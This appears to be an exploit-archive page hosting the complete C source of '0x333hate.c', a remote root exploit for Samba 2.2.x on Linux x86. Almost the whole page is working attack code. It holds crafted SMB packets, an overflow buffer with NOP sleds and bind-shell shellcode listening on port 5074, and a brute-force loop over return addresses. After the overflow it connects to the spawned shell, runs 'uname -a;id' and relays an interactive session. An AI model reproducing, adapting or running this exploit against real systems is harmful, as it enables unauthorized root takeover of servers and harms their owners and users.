what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

0x333hate.c

0x333hate.c
Posted Apr 30, 2003
Authored by Cowboy, 0x333 | Site 0x333.org

Samba 2.2.x Remote root exploit. Tested against RedHat 8.0.

tags | exploit, remote, root
systems | linux, redhat
SHA-256 | 13c39033253a9725ddb7ac8cf13eb639cca2208e1d16c19ff60bf316d0a4fbee

0x333hate.c

Change Mirror Download
/*  0x333hate => samba 2.2.x remote root exploit
*
* generic linux x86 samba remote root
* exploit, based on trans2root.pl
*
* coded by c0wboy
*
* ~ www.0x333.org ~
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>

#define fatal(x...) { fprintf (stderr, ##x); exit(-333); }

#define BUFFER 1500
#define SHELL 5074
#define PORT 139
#define NOP 0x90
#define START 0xbfffffff
#define STOP 0xbf000000
#define OFFSET 512

typedef enum {FALSE,TRUE} BOOLEAN;


unsigned char setup1[] =
"\x00\x00\x00\x2e\xff\x53\x4d\x42\x73\x00\x00\x00\x00"
"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00"
"\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";

unsigned char setup2[] =
"\x00\x00\x00\x3c\xff\x53\x4d\x42\x70\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x64\x00\x00\x00\x64\x00\x00\x00\x00\x00\x00"
"\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64"
"\x79\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";

unsigned char overflow[] =
"\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x64\x00\x00\x00\x00\xd0\x07"
"\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x90";

unsigned char shellcode[] =
"\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66"
"\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89"
"\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89"
"\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52"
"\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80"
"\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd"
"\x80";

int main (int argc, char *[]);
void usage (char *);
void hate (unsigned long);
void exploit (void);
BOOLEAN connection(char *, int);
int owned (int);

char buffer[BUFFER];
char zero[808] = "";
char * target=NULL;
int port = PORT;

struct sockaddr_in temp;
struct hostent *h;
int fdsocket;

void
usage (char * prg)
{
fprintf (stderr, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
fprintf (stderr, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n");
fprintf (stderr, " Usage : %s [-t target] [-p port] [-h]\n\n", prg);
fprintf (stderr, " \t-t\ttarget to attack\n");
fprintf (stderr, " \t-p\tsamba port (default 139)\n");
fprintf (stderr, " \t-h\tdisplay this help\n\n");

exit(-333);
}

void
hate (unsigned long ret)
{
int i;
char *ptr=buffer;

bzero(buffer, BUFFER);

memcpy ((char *)ptr, overflow, 96);

ptr += 96;
memset ((char *)ptr, NOP, (772+36));

ptr += (772+36);
memcpy ((char *)ptr, shellcode, strlen (shellcode));

ptr += strlen (shellcode);
memset ((char *)ptr, NOP, (87+44));

ptr += (87+44);

for (i = 1127 ; i < 1159 ; i += 4)
*(long *) &buffer[i] = ret;
}

void
exploit (void)
{
BOOLEAN status;
char outside[333];

if(!(status = connection (target, port)))
fatal (" [~] Error in connection\n");

/* here we setup connection */
if (send (fdsocket, setup1, sizeof (setup1)-1, 0) < 0)
fatal (" [~] Error in setup (1) connection\n");
recv (fdsocket, outside, sizeof (outside)-1, 0);

if (send (fdsocket, setup2, sizeof (setup2)-1, 0) < 0)
fatal (" [~] Error in setup (2) connection\n");
recv (fdsocket, outside, sizeof (outside)-1, 0);

/* exploiting samba */
if (send (fdsocket, buffer, sizeof (buffer)-1, 0) < 0)
fatal (" [~] Error in exploiting samba\n");

if (send (fdsocket, zero, sizeof (zero)-1, 0) < 0)
fatal (" [~] Error in exploiting samba\n");

close (fdsocket);

if((status = connection (target, SHELL)))
{
owned (fdsocket);
close (fdsocket);
}
}

BOOLEAN
connection (char *host, int port)
{
BOOLEAN status = TRUE;

temp.sin_family = AF_INET;
temp.sin_port = htons (port);
h = gethostbyname (host);

if (h == 0)
status = FALSE;
else
{
bcopy (h->h_addr,&temp.sin_addr,h->h_length);

if ((fdsocket = socket (AF_INET,SOCK_STREAM,0)) < 0)
status = FALSE;
else
if ((connect (fdsocket, (struct sockaddr*) &temp, sizeof (temp))) < 0)
status = FALSE;
}
return status;
}

int
owned (int fdsocket)
{
fd_set cya;
char outside[1024], *cmd="uname -a;id;\n";
int x;

FD_ZERO (&cya);
FD_SET (fdsocket, &cya);
FD_SET (0, &cya);

send (fdsocket, cmd, strlen (cmd), 0);

for(;;)
{
FD_SET (fdsocket, &cya);
FD_SET (0, &cya);

if (select (FD_SETSIZE, &cya, NULL, NULL, NULL) < 0)
break;

if (FD_ISSET (fdsocket, &cya))
{
if ((x = recv (fdsocket, outside, sizeof (outside)-1, 0)) < 0)
fatal (" [-] cya\n");

if (write (1, outside, x) < 0)
break;
}

if (FD_ISSET (0, &cya))
{
if ((x = read (0, outside, sizeof (outside)-1)) < 0)
fatal ("[-] cya\n");

if (send (fdsocket, outside, x, 0) < 0)
break;
}

usleep(10);
}

fprintf (stderr, " [-] cya hax0r\n");
exit(0);
}


int
main (int argc, char * argv[])
{
int c;
unsigned long ret;

while((c=getopt (argc, argv, "ht:p:")) != EOF)
{
switch(c)
{
case 't': target = optarg; break;
case 'p': port = atoi (optarg); break;
case 'h': usage (argv[0]);
default : usage (argv[0]);
}
}

if (argc==1 || target == NULL)
usage (argv[0]);

fprintf (stdout, "\n [~] 0x333hate => samba 2.2.x remote root exploit [~]\n");
fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~]\n\n");

fprintf (stdout, " [-] connecting to %s:%d\n", target, port);
fprintf (stdout, " [-] stating bruteforce\n\n");

for (ret=START; ret>=STOP; ret-=OFFSET)
{
fprintf (stdout, " [-] testing 0x%x\n", ret);
hate (ret);
exploit ();
}
fprintf (stdout, " [-] uhm ... maybe samba is not vulnerable !\n");
return 0;
}
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    25 Files
  • 16
    Aug 16th
    3 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close